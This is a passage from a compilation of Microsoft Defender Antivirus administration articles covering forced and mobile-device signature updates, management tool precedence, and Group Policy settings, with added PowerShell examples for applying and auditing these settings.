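Get-MpPreference | Select-Object SignatureUpdateCatchupInterval, DisableCatchupQuickScan, DisableCatchupFullScan
```

The final Get-MpPreference read-back matters in managed environments: Set-MpPreference doesn't fail when Group Policy or Configuration Manager already enforces a value, it is simply overridden, so a deployment script should compare the effective value with the intended one rather than trusting the cmdlet's silent return.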

 Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Related articles
Deploy Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus updates and apply baselines
Manage when protection updates should be downloaded and applied
Manage event-based forced updates
Manage updates for mobile devices and virtual machines (VMs)
Microsoft Defender Antivirus in Windows 10

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Manage event-based forced updates
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1

Microsoft Defender for Endpoint Plan 2

Microsoft Defender for Business

Microsoft Defender Antivirus

Platforms

Windows

Microsoft Defender Antivirus allows you to determine if updates should (or shouldn't)
occur after certain events, such as at startup or after receiving specific reports from the
cloud-delivered protection service.

Check for protection updates before running a scan
You can use Microsoft Defender for Endpoint Security Settings Management, Microsoft
Intune, Microsoft Configuration Manager, Group Policy, PowerShell cmdlets, and WMI to
force Microsoft Defender Antivirus to check and download protection updates before
running a scheduled scan.

Use Microsoft Defender for Endpoint Security Settings Management to check for protection updates before running a scan
1. On your Microsoft Defender for Endpoint console
(https://security.microsoft.com ), go to Endpoints > Configuration management
> Endpoint security policies > Create new policy.

In the Platform list, select Windows 10, Windows 11, and Windows Server.
In the Select Templates list, select Microsoft Defender Antivirus.

2. Fill in the name and description, and then select Next.

3. Go to the Scheduled scans section and set Check For Signatures Before Running
Scan to Enabled.

4. Deploy the updated policy as usual.

Use Microsoft Intune to check for protection updates before running a scan
1. In the Microsoft Intune admin center , go to Endpoints > Configuration
management > Endpoint security policies, and then select Create new policy.

In the Platform list, select Windows 10, Windows 11, and Windows Server.
In the Select Templates list, select Microsoft Defender Antivirus.

2. Fill in the name and description, and then select Next.

3. Go to the Scheduled scans section, and set Check For Signatures Before Running
Scan to Enabled.

4. Save and deploy the policy.

Use Configuration Manager to check for protection updates before running a scan
1. On your Microsoft Configuration Manager console, open the antimalware policy
you want to change (select Assets and Compliance in the navigation pane, then
expand the tree to Overview > Endpoint Protection > Antimalware Policies).

2. Go to the Scheduled scans section and set Check for the latest security
intelligence updates before running a scan to Yes.

3. Select OK.

4. Deploy the updated policy as usual.

Use Group Policy to check for protection updates before running a scan
1. On your Group Policy management machine, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure, and then select Edit.
3. Using the Group Policy Management Editor go to Computer configuration.

4. Select Policies then Administrative templates.

5. Expand the tree to Windows components > Microsoft Defender Antivirus > Scan.

6. Double-click Check for the latest virus and spyware definitions before running a
scheduled scan and set the option to Enabled.

7. Select OK.

Use PowerShell cmdlets to check for protection updates before running a scan

Use the following cmdlet ($true forces a protection update check before each scheduled
scan):

PowerShell

Set-MpPreference -CheckForSignaturesBeforeRunningScan $true

For more information, see Use PowerShell cmdlets to configure and run Microsoft
Defender Antivirus and Defender Antivirus cmdlets.

Use Windows Management Instrumentation (WMI) to check for protection updates before running a scan
Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

CheckForSignaturesBeforeRunningScan

For more information, see Windows Defender WMIv2 APIs.

Check for protection updates on startup
You can use Group Policy to force Microsoft Defender Antivirus to check and download
protection updates when the machine is started.

1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. Using the Group Policy Management Editor go to Computer configuration.


3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Security Intelligence Updates.

5. Double-click Check for the latest virus and spyware definitions on startup and set
the option to Enabled.

6. Select OK.

You can also use Group Policy, PowerShell, or WMI to configure Microsoft Defender
Antivirus to check for updates at startup even when no antimalware engine is present.

Use Group Policy to download updates when Microsoft Defender Antivirus is not present
1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. Using the Group Policy Management Editor, go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Security Intelligence Updates.

5. Double-click Initiate security intelligence update on startup and set the option to
Enabled.

6. Select OK.

Use PowerShell cmdlets to download updates when Microsoft Defender Antivirus is not present

Use the following cmdlet. The parameter name is inverted: setting it to $false allows the
startup update to run even when no antimalware engine is present.

PowerShell

Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $false

For more information, see Use PowerShell cmdlets to manage Microsoft Defender
Antivirus and Defender Antivirus cmdlets.
Use Windows Management Instrumentation (WMI) to download updates when Microsoft Defender Antivirus is not present
Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

SignatureDisableUpdateOnStartupWithoutEngine

For more information, see Windows Defender WMIv2 APIs.
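As an added example (not from the original article or from Microsoft), the following PowerShell applies both event-based settings from this article through the Set method of the MSFT_MpPreference WMI class, the same class the Set-MpPreference cmdlet wraps, and then reads the effective values back. It assumes an elevated session on Windows with the Defender WMIv2 provider in the root/Microsoft/Windows/Defender namespace; the desired values are this example's own choices.

```powershell
# Added example, not from the original article: set the event-based update settings via WMI.
# Assumes an elevated PowerShell session on Windows with the Defender WMIv2 provider.
# The "desired" values are this example's own choices, not documented defaults.

$ns = 'root/Microsoft/Windows/Defender'

# Desired state: refresh signatures before every scheduled scan, and run the startup update
# even when no antimalware engine is present. Note the inverted "Disable" in the second name.
$desired = @{
    CheckForSignaturesBeforeRunningScan          = $true
    SignatureDisableUpdateOnStartupWithoutEngine = $false
}

# The Set method of MSFT_MpPreference takes the property names as its arguments, so the
# same hashtable can carry any number of preferences in one call.
$result = Invoke-CimMethod -Namespace $ns -ClassName MSFT_MpPreference -MethodName Set -Arguments $desired
if ($result.ReturnValue -ne 0) {
    throw ('MSFT_MpPreference.Set failed with HRESULT 0x{0:X8}' -f $result.ReturnValue)
}

# Read back the effective preferences and diff them against what was requested. A mismatch
# usually means a higher-precedence source (Group Policy, Configuration Manager, Intune) or
# tamper protection owns the setting: the WMI call succeeds but the value is ignored.
$effective = Get-CimInstance -Namespace $ns -ClassName MSFT_MpPreference
$drift = foreach ($name in $desired.Keys) {
    if ($effective.$name -ne $desired[$name]) {
        [pscustomobject]@{ Setting = $name; Desired = $desired[$name]; Effective = $effective.$name }
    }
}

if ($drift) {
    $drift | Format-Table -AutoSize
} else {
    'Event-based update settings match the desired state.'
}
```

Because WMI is at the bottom of the precedence order described elsewhere in this documentation (Group Policy, then Configuration Manager, then Intune, then Security Settings Management, PowerShell, and WMI), the read-back step is the only reliable way to know whether the call actually changed anything on a managed device.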

Allow ad hoc changes to protection based on cloud-delivered protection
Microsoft Defender Antivirus can make changes to its protection based on cloud-
delivered protection. Such changes can occur outside of normal or scheduled protection
updates.

If you have enabled cloud-delivered protection, Microsoft Defender Antivirus sends files
it's suspicious about to the Windows Defender cloud. If the cloud service reports that
the file is malicious, and the file is detected in a recent protection update, you can use
Group Policy to configure Microsoft Defender Antivirus to automatically receive that
protection update. Other important protection updates can also be applied.

Use Group Policy to automatically download recent updates based on cloud-delivered protection
1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. Using the Group Policy Management Editor go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Security Intelligence Updates.

5. Double-click Allow real-time security intelligence updates based on reports to
Microsoft MAPS and set the option to Enabled. Then select OK.

6. Double-click Allow notifications to disable definitions-based reports to Microsoft
MAPS and set the option to Enabled. Then select OK.

Note

Allow notifications to disable definitions based reports enables Microsoft MAPS
to disable those definitions known to cause false-positive reports. You must
configure your computer to join Microsoft MAPS for this function to work.

See also
Deploy Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus updates and apply baselines
Manage when protection updates should be downloaded and applied
Manage updates for endpoints that are out of date
Manage updates for mobile devices and virtual machines (VMs)
Microsoft Defender Antivirus in Windows 10

Manage updates for mobile devices and
virtual machines (VMs)
Article • 03/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Mobile devices and VMs may require more configuration to ensure performance is not
impacted by updates.

There are two settings that are useful for these devices:

Opt in to Microsoft Update on mobile computers without a WSUS connection
Prevent Security intelligence updates when running on battery power

The following articles may also be useful in these situations:

Configuring scheduled and catch-up scans
Manage updates for endpoints that are out of date
Deployment guide for Microsoft Defender Antivirus in a virtual desktop
infrastructure (VDI) environment

Opt in to Microsoft Update on mobile computers without a WSUS connection
You can use Microsoft Update to keep Security intelligence on mobile devices running
Microsoft Defender Antivirus up to date when they are not connected to the corporate
network or don't otherwise have a WSUS connection.

This means that protection updates can be delivered to devices (via Microsoft Update)
even if you have set WSUS to override Microsoft Update.

You can opt in to Microsoft Update on the mobile device in one of the following ways:

Change the setting with Group Policy.
Create a VBScript and run it on each computer in your network.
Manually opt in every computer on your network through the Settings menu.

Use Group Policy to opt in to Microsoft Update
1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. In the Group Policy Management Editor go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Signature Updates.

5. Set Allow security intelligence updates from Microsoft Update to Enabled, and
then select OK.

Use a VBScript to opt in to Microsoft Update
1. Use the instructions in the MSDN article Opt-In to Microsoft Update to create the
VBScript.

2. Run the VBScript you created on each computer in your network.

Manually opt in to Microsoft Update
1. Open Windows Update in Update & security settings on the computer you want
to opt in.

2. Select Advanced options.

3. Select the checkbox for Give me updates for other Microsoft products when I
update Windows.
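The following PowerShell is an added example, not the article's VBScript and not code from Microsoft. It performs the Microsoft Update opt-in programmatically through the same Windows Update Agent COM interface the referenced MSDN article uses, verifies the registration, and then tells Microsoft Defender Antivirus to try Microsoft Update after the internal (WSUS) source. It assumes an elevated session on Windows; the service ID is the well-known Microsoft Update service ID from that article (verify it against the article before deploying), and the ClientApplicationID string and the fallback order are this example's own choices.

```powershell
# Added example, not from the original article: opt a device in to Microsoft Update
# through the Windows Update Agent COM API, then adjust the Defender fallback order.
# Assumes an elevated PowerShell session on Windows.
# Service ID: the well-known Microsoft Update service ID used by the referenced MSDN article.
$MicrosoftUpdateServiceId = '7971f918-a847-4430-9279-4a52d1efe18d'

# AddService2 flags (AddServiceFlag enumeration): combine all three so the registration
# works whether the device is online or offline and is picked up by Automatic Updates.
$asfAllowPendingRegistration = 1
$asfAllowOnlineRegistration  = 2
$asfRegisterServiceWithAU    = 4
$flags = $asfAllowPendingRegistration -bor $asfAllowOnlineRegistration -bor $asfRegisterServiceWithAU

$serviceManager = New-Object -ComObject 'Microsoft.Update.ServiceManager'
$serviceManager.ClientApplicationID = 'Defender AV Microsoft Update opt-in'   # assumption: any descriptive name

# Idempotent: only register the service if it isn't already present.
$existing = $serviceManager.Services | Where-Object { $_.ServiceID -eq $MicrosoftUpdateServiceId }
if (-not $existing) {
    $null = $serviceManager.AddService2($MicrosoftUpdateServiceId, $flags, '')
}

# Confirm the registration actually took before touching the antivirus configuration.
$registered = $serviceManager.Services | Where-Object { $_.ServiceID -eq $MicrosoftUpdateServiceId }
if (-not $registered) {
    throw 'Microsoft Update service was not registered with the Windows Update Agent.'
}
"Registered: $($registered.Name) (default Automatic Updates service: $($registered.IsDefaultAUService))"

# Assumption for a mobile device: keep WSUS first so on-network devices still use it, then fall
# back to Microsoft Update off-network, then to the direct Microsoft (MMPC) download.
Set-MpPreference -SignatureFallbackOrder 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC'
(Get-MpPreference).SignatureFallbackOrder
```

Running the script through your deployment tooling (or as a startup script) replaces the per-machine VBScript step; the Services check makes it safe to re-run on devices that were already opted in.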

Prevent Security intelligence updates when running on battery power
You can configure Microsoft Defender Antivirus to only download protection updates
when the PC is connected to a wired power source.
Use Group Policy to prevent security intelligence updates
on battery power
1. On your Group Policy management machine, open the Group Policy Management
Console, choose the Group Policy Object you want to configure, and open it for
editing.

2. In the Group Policy Management Editor go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Signature Updates, and then set Allow security intelligence updates when
running on battery power to Disabled. Then select OK.

This action prevents protection updates from downloading when the PC is on battery
power.

Related articles
Manage Microsoft Defender Antivirus updates and apply baselines
Update and manage Microsoft Defender Antivirus in Windows 10



Manage Microsoft Defender Antivirus in
your business
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

Tip

For the best experience, choose one method for configuring the Microsoft Defender
Antivirus policies.

Important

When the same setting is configured by more than one tool, the higher-precedence source
wins: Group Policy (GPO) takes precedence over Microsoft Configuration Manager, which
takes precedence over Microsoft Intune, which takes precedence over Microsoft Defender
for Endpoint Security Configuration Management, PowerShell, WMI, and MpCmdRun.exe. You
can manage and configure Microsoft Defender Antivirus with the following tools:

Microsoft Defender for Endpoint Security Configuration Management
Microsoft Intune
Microsoft Configuration Manager
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)
The Microsoft Malware Protection Command Line Utility (referred to as the
mpcmdrun.exe utility)

The following articles provide further information, links, and resources for using these
tools to manage and configure Microsoft Defender Antivirus.

Article | Description
Manage Microsoft Defender Antivirus with Microsoft Defender for Endpoint Security Configuration Management | Information about using Microsoft Defender for Endpoint Security Configuration Management to configure, manage, and report on Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus with Microsoft Intune and Microsoft Endpoint Configuration Manager | Information about using Intune and Configuration Manager to deploy, manage, report, and configure Microsoft Defender Antivirus
Manage Microsoft Defender Antivirus with Group Policy settings | List of all Group Policy settings located in ADMX templates
Manage Microsoft Defender Antivirus with PowerShell cmdlets | Instructions for using PowerShell cmdlets to manage Microsoft Defender Antivirus, plus links to documentation for all cmdlets and allowed parameters
Manage Microsoft Defender Antivirus with Windows Management Instrumentation (WMI) | Instructions for using WMI to manage Microsoft Defender Antivirus, plus links to documentation for the WMIv2 APIs (including all classes, methods, and properties)
Manage Microsoft Defender Antivirus with the MpCmdRun.exe command-line tool | Instructions on using the dedicated command-line tool to manage and use Microsoft Defender Antivirus

If you see high CPU usage from the Antimalware Service Executable (the Microsoft Defender
Antivirus service, MsMpEng.exe), review:

Performance analyzer for Microsoft Defender Antivirus


Use Microsoft Intune to configure and
manage Microsoft Defender Antivirus
Article • 02/19/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

You can use Microsoft Intune and Microsoft Configuration Manager to configure Microsoft
Defender Antivirus scans.

Configure Microsoft Defender Antivirus scans in Intune
1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com ), and
sign in.

2. Navigate to Endpoint Security.

3. Under Manage, choose Antivirus.

4. Select your Microsoft Defender Antivirus policy.

5. Under Manage, choose Properties.

6. Next to Configuration settings, choose Edit.

Important

The AllowIntrusionPreventionSystem antivirus setting is deprecated and can't be
configured.

7. Expand the Scan section, and review or edit your scanning settings.

8. Choose Review + save.

Tip

Need help? See Manage endpoint security in Microsoft Intune.

Related articles
Performance analyzer for Microsoft Defender Antivirus
Reference articles for management and configuration tools
Microsoft Defender Antivirus in Windows 10

Tip

Performance tip: Due to a variety of factors (examples listed below), Microsoft
Defender Antivirus, like other antivirus software, can cause performance issues on
endpoint devices. In some cases, you might need to tune the performance of
Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's
Performance analyzer is a PowerShell command-line tool that helps determine
which files, file paths, processes, and file extensions might be causing performance
issues; some examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations, for example:
top files per extension
top paths per extension
top processes per path
top scans per file
top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See: Performance analyzer for
Microsoft Defender Antivirus.


Use Group Policy settings to configure
and manage Microsoft Defender
Antivirus
Article • 05/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

We recommend using Microsoft Intune to manage Microsoft Defender Antivirus settings
for your organization. However, you can use Group Policy to configure and manage
some settings for Microsoft Defender Antivirus.

Important

If tamper protection is enabled in your organization, any changes made to tamper-
protected settings are ignored. In addition, you cannot turn off tamper protection
by using Group Policy.

If you must make changes to a device and those changes are blocked by tamper
protection, we recommend using troubleshooting mode to temporarily disable
tamper protection on the device. Note that after troubleshooting mode ends, any
changes made to tamper-protected settings are reverted to their configured state.

Configure Microsoft Defender Antivirus using Group Policy
In general, you can use the following procedure to configure or change some settings
for Microsoft Defender Antivirus.

1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object (GPO) you want to configure and click
Edit.
2. Using the Group Policy Management Editor go to Computer configuration.

3. Click Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus.

5. Expand the section (referred to as Location in the table in this topic) that contains
the setting you want to configure, double-click the setting to open it, and make
configuration changes.

6. Deploy the updated GPO as you normally do.
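As an added example (not from the original article or from Microsoft), the following PowerShell audits, on a single device, which Microsoft Defender Antivirus settings are actually being enforced through Group Policy and whether tamper protection will make local changes to them a no-op. It assumes an elevated session on Windows with the Defender module and the standard policy registry root HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender; the short table that maps policy registry values to Get-MpPreference properties is this example's own assumed shortlist, not a complete or official mapping.

```powershell
# Added example, not from the original article: find Defender AV settings enforced by Group
# Policy on this device, and check whether tamper protection will override local changes.
# Assumes an elevated PowerShell session on Windows with the Defender module.
# The $map below is an assumed shortlist of policy value -> preference property pairs.

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

# 1. Tamper protection state. When it is on, changes to tamper-protected settings are
#    ignored regardless of whether they come from Group Policy, PowerShell, or WMI.
$status = Get-MpComputerStatus
"Tamper protection enabled: $($status.IsTamperProtected)"

# 2. Collect every value under the Defender policy root. Only settings an administrator
#    configured in a GPO appear here; a missing value means "not managed by policy".
$policyValues = @{}
if (Test-Path $policyRoot) {
    $rootName = (Get-Item $policyRoot).Name
    foreach ($key in @(Get-Item $policyRoot) + @(Get-ChildItem $policyRoot -Recurse)) {
        $prefix = $key.Name.Substring($rootName.Length).TrimStart('\')
        if ($prefix) { $prefix += '\' }
        foreach ($name in $key.GetValueNames()) {
            $policyValues["$prefix$name"] = $key.GetValue($name)
        }
    }
}
'Policy-enforced values:'
$policyValues.GetEnumerator() | Sort-Object Name | Format-Table -AutoSize

# 3. Compare a few policy-backed values with the effective preference Defender reports.
#    Assumed mapping: registry value (relative to the policy root) -> Get-MpPreference property.
$map = @{
    'Real-Time Protection\DisableRealtimeMonitoring'   = 'DisableRealtimeMonitoring'
    'Scan\CheckForSignaturesBeforeRunningScan'         = 'CheckForSignaturesBeforeRunningScan'
    'Signature Updates\SignatureUpdateCatchupInterval' = 'SignatureUpdateCatchupInterval'
    'Spynet\SpynetReporting'                           = 'MAPSReporting'
}
$pref = Get-MpPreference
$report = foreach ($entry in $map.GetEnumerator()) {
    if ($policyValues.ContainsKey($entry.Key)) {
        [pscustomobject]@{
            PolicyValue = $entry.Key
            Configured  = $policyValues[$entry.Key]
            Effective   = $pref.($entry.Value)
            ManagedBy   = 'Group Policy'   # this source wins over Set-MpPreference and WMI
        }
    }
}
if ($report) { $report | Format-Table -AutoSize } else { 'None of the mapped settings are enforced by Group Policy.' }
```

Run this before troubleshooting a "setting won't stick" report: if the value shows up under the policy root, the fix belongs in the GPO (or in troubleshooting mode, as the Important note above describes), not in a local Set-MpPreference call.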

Group Policy settings and resources
The following table lists commonly used Group Policy settings that are available in
Windows 10.

Tip

For the most current settings, get the latest ADMX files into your central store so the
correct policy options are available. See How to create and manage the Central Store
for Group Policy Administrative Templates in Windows and download the latest
files.

Location | Setting | Article
Client interface | Enable headless UI mode | Prevent users from seeing or interacting with the Microsoft Defender Antivirus user interface
Client interface | Display additional text to clients when they need to perform an action | Configure the notifications that appear on endpoints
Client interface | Suppress all notifications | Configure the notifications that appear on endpoints
Client interface | Suppresses reboot notifications | Configure the notifications that appear on endpoints
Exclusions | Extension Exclusions | Configure and validate exclusions in Microsoft Defender Antivirus scans
Exclusions | Path Exclusions | Configure and validate exclusions in Microsoft Defender Antivirus scans
Exclusions | Process Exclusions | Configure and validate exclusions in Microsoft Defender Antivirus scans
Exclusions | Turn off Auto Exclusions | Configure and validate exclusions in Microsoft Defender Antivirus scans
MAPS | Configure the "Block at First Sight" feature | Enable block at first sight
MAPS | Join Microsoft MAPS | Enable cloud-delivered protection
MAPS | Send file samples when further analysis is required | Enable cloud-delivered protection
MAPS | Configure local setting override for reporting to Microsoft MAPS | Prevent or allow users to locally modify policy settings
MpEngine | Configure extended cloud check | Configure the cloud block timeout period
MpEngine | Select cloud protection level | Specify the cloud-delivered protection level
Network inspection system | Specify additional definition sets for network traffic inspection | Not used (deprecated)
Network inspection system | Turn on definition retirement | Not used (deprecated)
Network inspection system | Turn on protocol recognition | Not used (deprecated)
Quarantine | Configure local setting override for the removal of items from Quarantine folder | Prevent or allow users to locally modify policy settings
Quarantine | Configure removal of items from Quarantine folder | Configure remediation for Microsoft Defender Antivirus scans
Real-time protection | Configure local setting override for monitoring file and program activity on your computer | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override for monitoring for incoming and outgoing file activity | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override for scanning all downloaded files and attachments | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override for turn on behavior monitoring | Prevent or allow users to locally modify policy settings
Real-time protection | Configure local setting override to turn on real-time protection | Prevent or allow users to locally modify policy settings
Real-time protection | Define the maximum size of downloaded files and attachments to be scanned | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Monitor file and program activity on your computer | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Scan all downloaded files and attachments | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Turn off real-time protection | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on behavior monitoring | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on process scanning whenever real-time protection is enabled | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on raw volume write notifications | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Real-time protection | Configure monitoring for incoming and outgoing file and program activity | Enable and configure Microsoft Defender Antivirus always-on protection and monitoring
Remediation | Configure local setting override for the time of day to run a scheduled full scan to complete remediation | Prevent or allow users to locally modify policy settings
Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Configure scheduled Microsoft Defender Antivirus scans
Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Configure scheduled Microsoft Defender Antivirus scans
Reporting | Turn off enhanced notifications | Configure the notifications that appear on endpoints
Root | Turn off Microsoft Defender Antivirus | Not used. If you're using or planning to use a non-Microsoft antivirus product, see Microsoft Defender Antivirus compatibility with other security products.
Root | Define addresses to bypass proxy server | Configure device proxy and Internet connectivity settings
Root | Define proxy autoconfig (.pac) for connecting to the network | Configure device proxy and Internet connectivity settings
Root | Define proxy server for connecting to the network | Configure device proxy and Internet connectivity settings
Root | Configure local administrator merge behavior for lists | Prevent or allow users to locally modify policy settings
Root | Allow antimalware service to start up with normal priority | Configure remediation for Microsoft Defender Antivirus scans
Root Allow antimalware service Configure remediation for Microsoft Defender


to remain running always Antivirus scans

Root Turn off routine Configure remediation for Microsoft Defender


remediation Antivirus scans

Root Randomize scheduled task Configure scheduled scans for Microsoft Defender
times Antivirus

Scan Allow users to pause scan Prevent users from seeing or interacting with the
Microsoft Defender Antivirus user interface (Not
supported on Windows 10)

Scan Check for the latest virus Manage event-based forced updates
and spyware definitions
Location Setting Article

before running a scheduled


scan

Scan Define the number of days Manage updates for endpoints that are out of
after which a catch-up scan date
is forced

Scan Turn on catch up full scan Manage updates for endpoints that are out of
date

Scan Turn on catch up quick Manage updates for endpoints that are out of
scan date

Scan Configure local setting Prevent or allow users to locally modify policy
override for maximum settings
percentage of CPU
utilization

Scan Configure local setting Prevent or allow users to locally modify policy
override for schedule scan settings
day

Scan Configure local setting Prevent or allow users to locally modify policy
override for scheduled settings
quick scan time

Scan Configure local setting Prevent or allow users to locally modify policy
override for scheduled scan settings
time

Scan Configure local setting Prevent or allow users to locally modify policy
override for the scan type settings
to use for a scheduled scan

Scan Create a system restore Configure remediation for Microsoft Defender


point Antivirus scans

Scan Turn on removal of items Configure remediation for Microsoft Defender


from scan history folder Antivirus scans

Scan Turn on heuristics Enable and configure Microsoft Defender


Antivirus always-on protection and monitoring

Scan Turn on e-mail scanning Configure scanning options in Microsoft Defender


Antivirus

Scan Turn on reparse point Configure scanning options in Microsoft Defender


scanning Antivirus
Location Setting Article

Scan Run full scan on mapped Configure scanning options in Microsoft Defender
network drives Antivirus

Scan Scan archive files Configure scanning options in Microsoft Defender


Antivirus

Scan Scan network files Configure scanning options in Microsoft Defender


Antivirus

Scan Scan packed executables Configure scanning options in Microsoft Defender


Antivirus

Scan Scan scripts Configure scanning options in Microsoft Defender


Antivirus

Also see Defender/AllowScriptScanning.

Scan Scan removable drives Configure scanning options in Microsoft Defender


Antivirus

Scan Specify the maximum Configure scanning options in Microsoft Defender


depth to scan archive files Antivirus

Scan Specify the maximum Configure scanning options in Microsoft Defender


percentage of CPU Antivirus
utilization during a scan

Scan Specify the maximum size Configure scanning options in Microsoft Defender
of archive files to be Antivirus
scanned

Scan Specify the day of the week Configure scheduled scans for Microsoft Defender
to run a scheduled scan Antivirus

Scan Specify the interval to run Configure scheduled scans for Microsoft Defender
quick scans per day Antivirus

Scan Specify the scan type to Configure scheduled scans for Microsoft Defender
use for a scheduled scan Antivirus

Scan Specify the time for a daily Configure scheduled scans for Microsoft Defender
quick scan Antivirus

Scan Specify the time of day to Configure scheduled scans for Microsoft Defender
run a scheduled scan Antivirus

Scan Start the scheduled scan Configure scheduled scans for Microsoft Defender
only when computer is on Antivirus
but not in use
Location Setting Article

Security Allow security intelligence Manage updates for mobile devices and virtual
intelligence updates from Microsoft machines (VMs)
updates Update

Security Allow security intelligence Manage updates for mobile devices and virtual
intelligence updates when running on machines (VMs)
updates battery power

Security Allow notifications to Manage event-based forced updates


intelligence disable definitions-based
updates reports to Microsoft MAPS

Security Allow real-time security Manage event-based forced updates


intelligence intelligence updates based
updates on reports to Microsoft
MAPS

Security Check for the latest virus Manage event-based forced updates
intelligence and spyware definitions on
updates startup

Security Define file shares for Manage Microsoft Defender Antivirus protection
intelligence downloading security and security intelligence updates
updates intelligence updates

Security Define the number of days Manage updates for endpoints that are out of
intelligence after which a catch up date
updates security intelligence update
is required

Security Define the number of days Manage updates for endpoints that are out of
intelligence before spyware definitions date
updates are considered out of date

Security Define the number of days Manage updates for endpoints that are out of
intelligence before virus definitions are date
updates considered out of date

Security Define the order of sources Manage Microsoft Defender Antivirus protection
intelligence for downloading security and security intelligence updates
updates intelligence updates

Security Initiate security intelligence Manage event-based forced updates


intelligence update on startup
updates

Security Specify the day of the week Manage when protection updates should be
intelligence to check for security downloaded and applied
updates intelligence updates
Location Setting Article

Security Specify the interval to Manage when protection updates should be


intelligence check for security downloaded and applied
updates intelligence updates

Security Specify the time to check Manage when protection updates should be
intelligence for security intelligence downloaded and applied
updates updates

Security Turn on scan after Security Configure scheduled scans for Microsoft Defender
intelligence intelligence update Antivirus
updates

Threats Specify threat alert levels at Configure remediation for Microsoft Defender
which default action should Antivirus scans
not be taken when
detected

Threats Specify threats upon which Configure remediation for Microsoft Defender
default action should not Antivirus scans
be taken when detected

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Tip

Performance tip: Due to a variety of factors (examples listed below), Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's Performance analyzer is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations, for example:
    top files per extension
    top paths per extension
    top processes per path
    top scans per file
    top scans per file per process

You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions. See: Performance analyzer for Microsoft Defender Antivirus.

See also
Performance analyzer for Microsoft Defender Antivirus
Reference topics for management and configuration tools
Microsoft Defender Antivirus in Windows 10

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Use PowerShell cmdlets to configure and manage Microsoft Defender Antivirus
Article • 12/15/2022

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

You can use PowerShell to perform various functions in Microsoft Defender Antivirus. Similar to
